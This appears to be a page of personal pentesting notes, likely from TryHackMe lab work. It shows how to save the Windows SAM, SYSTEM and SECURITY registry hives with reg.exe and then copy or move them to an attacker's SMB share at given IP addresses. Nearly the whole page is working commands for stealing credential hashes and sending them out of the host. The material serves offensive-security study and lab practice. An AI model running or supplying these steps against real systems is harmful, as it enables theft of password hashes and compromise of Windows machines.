Copying Registry Hives with reg.exe

PS. This needs to be admin user or privileged user

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save

C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

OR

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

The next here is to copy the saved files to our smb using impacket smbserver.py
After we setup the smbserver go prefer from the impacket section in linux
Just use the copy command and copy to the attacker IP and the share folder name

copy C:\Users\THMBackup\sam.hive \\10.9.193.229\public\
copy C:\Users\THMBackup\system.hive \\10.9.193.229\public\

ORRR

C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.

PreviousCopying NTDS.dit via evil-winrm Nextreg add

Last updated 1 year ago